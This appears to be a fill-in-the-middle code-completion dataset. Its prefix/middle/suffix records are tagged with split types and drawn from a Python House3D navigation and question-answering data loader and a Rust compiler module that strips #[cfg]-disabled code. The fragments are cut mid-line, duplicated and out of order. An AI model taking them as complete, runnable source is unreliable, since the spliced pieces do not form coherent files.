env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][
|
def __init__(self, data_json, data_h5,
path_feats_dir,
path_images_dir,
split,
|
random_line_split
|
|
nav_loc_vqa_rl_loader.py
|
%d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int64
- nav_ego_imgs #navs of (l, 224, 224, 3) uint8 if necessary
private variables:
- episode_house
- nav_pos_queues #navs of l [x, y, z, yaw]
- path_len
"""
idx = self.available_idx[index]
qn = self.questions[idx]
qid = qn['id']
house = qn['house']
attr, room_attr = self.question_to_attribute(qn)
# encode question and answer
qe = self.encoded_questions[qn['h5_id']]
ae = self.encoded_answers[qn['h5_id']]
# choose path_ix
path_ix = random.choice(range(qn['num_paths'])) if self.split == 'train' else 0
path_feats_h5 = h5py.File(osp.join(self.path_feats_dir, qn['path_name']+'.h5'), 'r')
raw_ego_feats = path_feats_h5['ego_rgb%s' % path_ix][...].reshape(-1, 3200) # (L, 32, 10, 10)
raw_path_len = raw_ego_feats.shape[0]
raw_actions = qn['path_actions'][path_ix] # (L, )
raw_pos_queue = qn['path_positions'][path_ix] # list of L positions
if self.requires_imgs:
path_images_h5 = h5py.File(osp.join(self.path_images_dir, qn['path_name']+'.h5'), 'r')
raw_ego_imgs = path_images_h5['ego_rgb%s' % path_ix] # (L, 224, 224, 3)
nav_ego_imgs = []
# nav_phrases, nav_phrase_embs
nav_pgs = [pg for pg in qn['program'] if 'nav' in pg['function']]
nav_ids = [pg['id'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_types = [pg['function'][4:] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrases = [pg['value_inputs'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrase_embs = []
for phrase in nav_phrases:
nav_phrase_embs.append(np.array([self.wtov[wd] for wd in phrase.split()]).mean(0).astype(np.float32)) # (300, )
nav_phrase_embs = np.array(nav_phrase_embs) # (#targets, 300)
# For each segment path: feats + actions + pos_queue
raw_key_ixs = qn['key_ixs_set'][path_ix]
nav_ego_feats = []
nav_action_inputs = []
nav_action_outputs = []
nav_pos_queues = []
for i, key_ix in enumerate(raw_key_ixs):
start_ix = 0 if i == 0 else raw_key_ixs[i-1] # we use last key_ix moment as start (spawn location)
end_ix = raw_key_ixs[i]+1
ego_feats = raw_ego_feats[start_ix:end_ix]
action_inputs = np.array([4] + raw_actions[start_ix:end_ix][:-1], dtype=np.int64)
action_outputs = np.array(raw_actions[start_ix:end_ix-1] + [3], dtype=np.int64)
pos_queue = raw_pos_queue[start_ix:end_ix]
assert ego_feats.shape[0] == len(pos_queue) == action_inputs.shape[0]
# add to list
nav_ego_feats.append(ego_feats)
nav_action_inputs.append(action_inputs)
nav_action_outputs.append(action_outputs)
nav_pos_queues.append(pos_queue)
if self.requires_imgs:
nav_ego_imgs.append(raw_ego_imgs[start_ix:end_ix])
# cache
if self.to_cache and index not in self.img_data_cache:
self.img_data_cache[index] = True # TODO: replace with ego_feats
# private variable
self.episode_house = self.env_loaded[house]
self.nav_pos_queues = nav_pos_queues
self.path_len = raw_path_len
# return
data = {}
data['idx'] = idx
data['qid'] = qid
data['house'] = qn['house']
data['question'] = qn['question']
data['answer'] = qn['answer']
data['type'] = qn['type']
data['attr'] = attr
data['qe'] = qe
data['ae'] = ae
data['path_name'] = qn['path_name']
data['path_ix'] = path_ix
data['nav_ids'] = nav_ids
data['nav_types'] = nav_types
data['nav_phrases'] = nav_phrases
data['nav_phrase_embs'] = nav_phrase_embs
data['nav_ego_feats'] = nav_ego_feats
data['nav_action_inputs'] = nav_action_inputs
data['nav_action_outputs'] = nav_action_outputs
if self.requires_imgs:
|
data['nav_ego_imgs'] = nav_ego_imgs
|
conditional_block
|
|
nav_loc_vqa_rl_loader.py
|
print('%s questions loaded for type %s under split[%s].' % (len(self.questions), question_types, split))
# hid_tid_to_best_iou
self.hid_tid_to_best_iou = self.infos['hid_tid_to_best_iou'] # hid_tid --> best_iou
# load data.h5
encoded = h5py.File(data_h5, 'r')
self.encoded_questions = encoded['encoded_questions']
self.encoded_answers = encoded['encoded_answers']
assert self.encoded_questions.shape[0] == self.encoded_answers.shape[0]
print('max_length of encoded_questions is', self.encoded_questions.shape[1])
print('[%s] data prepared, where there are %s questions.' % (split, len(self.questions)))
# actions
self.actions = ['forward', 'left', 'right', 'dummy']
self.act_to_ix = {'forward': 0, 'left': 1, 'right': 2, 'stop': 3, 'dummy': 4}
self.ix_to_act = {i: a for a, i in self.act_to_ix.items()}
# more info
self.split = split
self.path_feats_dir = path_feats_dir
self.path_images_dir = path_images_dir
self.requires_imgs = requires_imgs
self.pre_size = 5 # hard code it
self.gpu_id = gpu_id
self.cfg = cfg
self.max_threads_per_gpu = max_threads_per_gpu
self.target_obj_conn_map_dir = target_obj_conn_map_dir
self.map_resolution = map_resolution
self.to_cache = to_cache
self.height = height or 224
self.width = width or 224
self.episode_pos_queue = None
self.episode_house = None
self.target_room = None
self.target_obj = None
self.img_data_cache = {} # qid --> feats
self.available_idx = []
self.visited_envs = set()
self.api_threads = []
# set up cnn
cnn_kwargs = {'num_classes': 191, 'pretrained': True, 'checkpoint_path': pretrained_cnn_path}
self.cnn = MultitaskCNN(**cnn_kwargs).cuda()
self.cnn.eval()
print('cnn set up.')
# construct mapping
self.envs = list(set([qn['house'] for qn in self.questions])) # all house_ids
self.env_idx = [self.envs.index(qn['house']) for qn in self.questions] # house index for each question
self.env_list = [self.envs[x] for x in self.env_idx] # list of house_ids for each question
self.env_set = list(set(self.env_list))
self.env_set.sort() # ordered house_ids
if ratio:
assert isinstance(ratio, list), ratio
self.env_set = self.env_set[int(ratio[0]*len(self.env_set)):int(ratio[1]*len(self.env_set))]
print('Total envs: %d' % len(self.envs))
print('Envs in [%s]: %d, we use %d.' % (self.split, len(list(set(self.env_idx))), len(self.env_set)))
# load environments
self._load_envs(start_idx=0, in_order=True)
def _pick_envs_to_load(self, split, max_envs, start_idx, in_order):
"""
pick houses from self.env_set
"""
if split in ['val', 'test'] or in_order:
pruned_env_set = self.env_set[start_idx:start_idx+max_envs] # could be empty if start_idx reaches the end
else:
if max_envs < len(self.env_set):
env_inds = np.random.choice(len(self.env_set), max_envs, replace=False)
else:
env_inds = np.random.choice(len(self.env_set), max_envs, replace=True)
pruned_env_set = [self.env_set[x] for x in env_inds]
return pruned_env_set
def _load_envs(self, start_idx=-1, in_order=False):
if start_idx == -1: # next env
start_idx = self.env_set.index(self.pruned_env_set[-1]) + 1
# pick envs
self.pruned_env_set = self._pick_envs_to_load(self.split, self.max_threads_per_gpu,
start_idx, in_order)
if len(self.pruned_env_set) == 0:
return
# Load api threads
start = time.time()
if len(self.api_threads) == 0:
for i in range(self.max_threads_per_gpu):
self.api_threads.append(objrender.RenderAPIThread(w=self.width, h=self.height, device=self.gpu_id))
print('[%.2f] Loaded %d api threads' % (time.time()-start, len(self.api_threads)))
# Load houses
start = time.time()
from multiprocessing import Pool
_args = ([h, self.cfg, self.map_resolution] for h in self.pruned_env_set)
with Pool(len(self.pruned_env_set)) as pool:
self.all_houses = pool.starmap(local_create_house, _args)
print('[%.02f] Loaded %d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
|
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int
|
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
|
identifier_body
|
config.rs
|
ared_doc: false,
span,
})
} else {
None
}
}
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
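in_cfg keeps a node only if every one of its attributes passes: #[test]/#[bench] fail when not compiling with --test, non-cfg attributes always pass, malformed #[cfg] attributes are reported but do not filter the node, and a well-formed #[cfg(pred)] passes exactly when its single predicate matches the session. The same keep/drop rule sketched in Python, with a hypothetical matches callback standing in for attr::cfg_matches:

def in_cfg(attrs, should_test, matches):
    # attrs are hypothetical dicts like {'name': 'cfg', 'preds': ['unix']}.
    def keep(attr):
        if not should_test and attr['name'] in ('test', 'bench'):
            return False
        if attr['name'] != 'cfg':
            return True                  # non-cfg attributes never filter the node
        preds = attr.get('preds', [])
        if len(preds) != 1:
            return True                  # malformed cfg: error reported elsewhere, node kept
        return matches(preds[0])
    return all(keep(a) for a in attrs)

# in_cfg([{'name': 'cfg', 'preds': ['unix']}], True, lambda p: p == 'unix') -> True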
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
}
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check_name("cfg_attr") {
"cfg_attr"
} else {
continue;
};
let msg = format!("#[{}] cannot be applied on a generic parameter", offending_attr);
self.sess.span_diagnostic.span_err(attr.span, &msg);
}
}
}
impl<'a> fold::Folder for StripUnconfigured<'a> {
fn fold_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
let foreign_mod = self.configure_foreign_mod(foreign_mod);
fold::noop_fold_foreign_mod(foreign_mod, self)
}
fn fold_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
let item = self.configure_item_kind(item);
fold::noop_fold_item_kind(item, self)
}
fn fold_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
let mut expr = self.configure_expr(expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
P(fold::noop_fold_expr(expr, self))
}
fn fold_opt_expr(&mut self, expr: P<ast::Expr>) -> Option<P<ast::Expr>> {
let mut expr = configure!(self, expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
Some(P(fold::noop_fold_expr(expr, self)))
}
fn fold_stmt(&mut self, stmt: ast::Stmt) -> SmallVector<ast::Stmt> {
match self.configure_stmt(stmt) {
Some(stmt) => fold::noop_fold_stmt(stmt, self),
None => return SmallVector::new(),
}
}
fn fold_item(&mut self, item: P<ast::Item>) -> SmallVector<P<ast::Item>> {
fold::noop_fold_item(configure!(self, item), self)
}
fn fold_impl_item(&mut self, item: ast::ImplItem) -> SmallVector<ast::ImplItem> {
fold::noop_fold_impl_item(configure!(self, item), self)
}
fn fold_trait_item(&mut self, item: ast::TraitItem) -> SmallVector<ast::TraitItem> {
fold::noop_fold_trait_item(configure!(self, item), self)
}
fn fold_mac(&mut self, mac: ast::Mac) -> ast::Mac {
// Don't configure interpolated AST (c.f. #34171).
// Interpolated AST will get configured once the surrounding tokens are parsed.
mac
}
fn fold_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
fold::noop_fold_pat(self.configure_pat(pattern), self)
}
}
fn is_cfg(attr: &ast::Attribute) -> bool
|
{
attr.check_name("cfg")
}
|
identifier_body
|
|
config.rs
|
::OpenDelim(token::Paren))?;
let cfg = parser.parse_meta_item()?;
parser.expect(&token::Comma)?;
let lo = parser.span.lo();
let (path, tokens) = parser.parse_path_and_tokens()?;
parser.expect(&token::CloseDelim(token::Paren))?;
Ok((cfg, path, tokens, parser.prev_span.with_lo(lo)))
}) {
Ok(result) => result,
Err(mut e) => {
e.emit();
return None;
}
};
if attr::cfg_matches(&cfg, self.sess, self.features) {
self.process_cfg_attr(ast::Attribute {
id: attr::mk_attr_id(),
style: attr.style,
path,
tokens,
is_sugared_doc: false,
span,
})
} else {
None
}
}
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
pub fn maybe_emit_expr_attr_err(&self, attr: &ast::Attribute) {
if !self.features.map(|features| features.stmt_expr_attributes).unwrap_or(true) {
let mut err = feature_err(self.sess,
"stmt_expr_attributes",
attr.span,
GateIssue::Language,
EXPLAIN_STMT_ATTR_SYNTAX);
if attr.is_sugared_doc {
err.help("`///` is for documentation comments. For a plain comment, use `//`.");
}
err.emit();
}
}
pub fn configure_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
ast::ForeignMod {
abi: foreign_mod.abi,
items: foreign_mod.items.into_iter().filter_map(|item| self.configure(item)).collect(),
}
}
fn configure_variant_data(&mut self, vdata: ast::VariantData) -> ast::VariantData {
match vdata {
ast::VariantData::Struct(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Struct(fields.collect(), id)
}
ast::VariantData::Tuple(fields, id) => {
let fields = fields.into_iter().filter_map(|field| self.configure(field));
ast::VariantData::Tuple(fields.collect(), id)
}
ast::VariantData::Unit(id) => ast::VariantData::Unit(id)
}
}
pub fn configure_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
match item {
ast::ItemKind::Struct(def, generics) => {
ast::ItemKind::Struct(self.configure_variant_data(def), generics)
}
ast::ItemKind::Union(def, generics) => {
ast::ItemKind::Union(self.configure_variant_data(def), generics)
}
ast::ItemKind::Enum(def, generics) => {
let variants = def.variants.into_iter().filter_map(|v| {
self.configure(v).map(|v| {
Spanned {
node: ast::Variant_ {
ident: v.node.ident,
attrs: v.node.attrs,
data: self.configure_variant_data(v.node.data),
disr_expr: v.node.disr_expr,
},
span: v.span
}
})
});
ast::ItemKind::Enum(ast::EnumDef {
variants: variants.collect(),
}, generics)
}
item => item,
}
}
pub fn configure_expr_kind(&mut self, expr_kind: ast::ExprKind) -> ast::ExprKind {
match expr_kind {
ast::ExprKind::Match(m, arms) => {
let arms = arms.into_iter().filter_map(|a| self.configure(a)).collect();
ast::ExprKind::Match(m, arms)
}
ast::ExprKind::Struct(path, fields, base) => {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
ast::ExprKind::Struct(path, fields, base)
}
_ => expr_kind,
}
}
pub fn configure_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
self.visit_expr_attrs(expr.attrs());
// If an expr is valid to cfg away it will have been removed by the
// outer stmt or expression folder before descending in here.
// Anything else is always required, and thus has to error out
// in case of a cfg attr.
//
// NB: This is intentionally not part of the fold_expr() function
// in order for fold_opt_expr() to be able to avoid this check
if let Some(attr) = expr.attrs().iter().find(|a| is_cfg(a) || is_test_or_bench(a)) {
let msg = "removing an expression is not supported in this position";
self.sess.span_diagnostic.span_err(attr.span, msg);
}
self.process_cfg_attrs(expr)
}
pub fn configure_stmt(&mut self, stmt: ast::Stmt) -> Option<ast::Stmt> {
self.configure(stmt)
}
pub fn configure_struct_expr_field(&mut self, field: ast::Field) -> Option<ast::Field> {
self.configure(field)
}
pub fn configure_pat(&mut self, pattern: P<ast::Pat>) -> P<ast::Pat> {
pattern.map(|mut pattern| {
if let ast::PatKind::Struct(path, fields, etc) = pattern.node {
let fields = fields.into_iter()
.filter_map(|field| {
self.configure(field)
})
.collect();
pattern.node = ast::PatKind::Struct(path, fields, etc);
}
pattern
})
}
// deny #[cfg] on generic parameters until we decide what to do with it.
// see issue #51279.
pub fn disallow_cfg_on_generic_param(&mut self, param: &ast::GenericParam) {
for attr in param.attrs() {
let offending_attr = if attr.check_name("cfg") {
"cfg"
} else if attr.check_name("cfg_attr") {
"cfg_attr"
} else {
continue;
};
let msg = format!("#[{}] cannot be applied on a generic parameter", offending_attr);
self.sess.span_diagnostic.span_err(attr.span, &msg);
}
}
}
impl<'a> fold::Folder for StripUnconfigured<'a> {
fn fold_foreign_mod(&mut self, foreign_mod: ast::ForeignMod) -> ast::ForeignMod {
let foreign_mod = self.configure_foreign_mod(foreign_mod);
fold::noop_fold_foreign_mod(foreign_mod, self)
}
fn fold_item_kind(&mut self, item: ast::ItemKind) -> ast::ItemKind {
let item = self.configure_item_kind(item);
fold::noop_fold_item_kind(item, self)
}
fn fold_expr(&mut self, expr: P<ast::Expr>) -> P<ast::Expr> {
let mut expr = self.configure_expr(expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
P(fold::noop_fold_expr(expr, self))
}
fn fold_opt_expr(&mut self, expr: P<ast::Expr>) -> Option<P<ast::Expr>> {
let mut expr = configure!(self, expr).into_inner();
expr.node = self.configure_expr_kind(expr.node);
Some(P(fold::noop_fold_expr(expr, self)))
}
fn fold_stmt(&mut self, stmt: ast::Stmt) -> SmallVector<ast::Stmt> {
match self.configure_stmt(stmt) {
Some(stmt) => fold::noop_fold_stmt(stmt, self),
None => return SmallVector::new(),
}
}
fn fold_item(&mut self, item: P<ast::Item>) -> SmallVector<P<ast::Item>> {
fold::noop_fold_item(configure!(self, item), self)
}
fn fold_impl_item(&mut self, item: ast::ImplItem) -> SmallVector<ast::ImplItem> {
fold::noop_fold_impl_item(configure!(self, item), self)
}
fn
|
fold_trait_item
|
identifier_name
|
|
config.rs
|
rate, sess: &ParseSess, should_test: bool, edition: Edition)
-> (ast::Crate, Features) {
let features;
{
let mut strip_unconfigured = StripUnconfigured {
should_test,
sess,
features: None,
};
let unconfigured_attrs = krate.attrs.clone();
let err_count = sess.span_diagnostic.err_count();
if let Some(attrs) = strip_unconfigured.configure(krate.attrs) {
krate.attrs = attrs;
} else { // the entire crate is unconfigured
krate.attrs = Vec::new();
krate.module.items = Vec::new();
return (krate, Features::new());
}
features = get_features(&sess.span_diagnostic, &krate.attrs, edition);
// Avoid reconfiguring malformed `cfg_attr`s
if err_count == sess.span_diagnostic.err_count() {
strip_unconfigured.features = Some(&features);
strip_unconfigured.configure(unconfigured_attrs);
}
}
(krate, features)
}
macro_rules! configure {
($this:ident, $node:ident) => {
match $this.configure($node) {
Some(node) => node,
None => return Default::default(),
}
}
}
impl<'a> StripUnconfigured<'a> {
pub fn configure<T: HasAttrs>(&mut self, node: T) -> Option<T> {
let node = self.process_cfg_attrs(node);
if self.in_cfg(node.attrs()) { Some(node) } else { None }
}
pub fn process_cfg_attrs<T: HasAttrs>(&mut self, node: T) -> T {
node.map_attrs(|attrs| {
attrs.into_iter().filter_map(|attr| self.process_cfg_attr(attr)).collect()
})
}
fn process_cfg_attr(&mut self, attr: ast::Attribute) -> Option<ast::Attribute> {
if !attr.check_name("cfg_attr") {
return Some(attr);
}
let (cfg, path, tokens, span) = match attr.parse(self.sess, |parser| {
parser.expect(&token::OpenDelim(token::Paren))?;
let cfg = parser.parse_meta_item()?;
parser.expect(&token::Comma)?;
let lo = parser.span.lo();
let (path, tokens) = parser.parse_path_and_tokens()?;
parser.expect(&token::CloseDelim(token::Paren))?;
Ok((cfg, path, tokens, parser.prev_span.with_lo(lo)))
}) {
Ok(result) => result,
Err(mut e) => {
e.emit();
return None;
}
};
if attr::cfg_matches(&cfg, self.sess, self.features) {
self.process_cfg_attr(ast::Attribute {
id: attr::mk_attr_id(),
style: attr.style,
path,
tokens,
is_sugared_doc: false,
span,
})
} else {
None
}
}
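process_cfg_attr rewrites #[cfg_attr(pred, attr)] into #[attr] when pred matches the current session (recursing, so a nested cfg_attr is expanded too), drops it when pred does not match, and passes every other attribute through untouched. A hypothetical Python sketch of that expansion, with matches again standing in for attr::cfg_matches:

def process_cfg_attr(attr, matches):
    # attr is a hypothetical dict; cfg_attr carries a predicate and an inner attribute.
    if attr['name'] != 'cfg_attr':
        return attr                                   # ordinary attribute: keep as-is
    if not matches(attr['pred']):
        return None                                   # predicate false: drop the attribute
    return process_cfg_attr(attr['inner'], matches)   # predicate true: expand, possibly nested

# process_cfg_attr({'name': 'cfg_attr', 'pred': 'unix', 'inner': {'name': 'derive'}},
#                  lambda p: p == 'unix') -> {'name': 'derive'}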
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
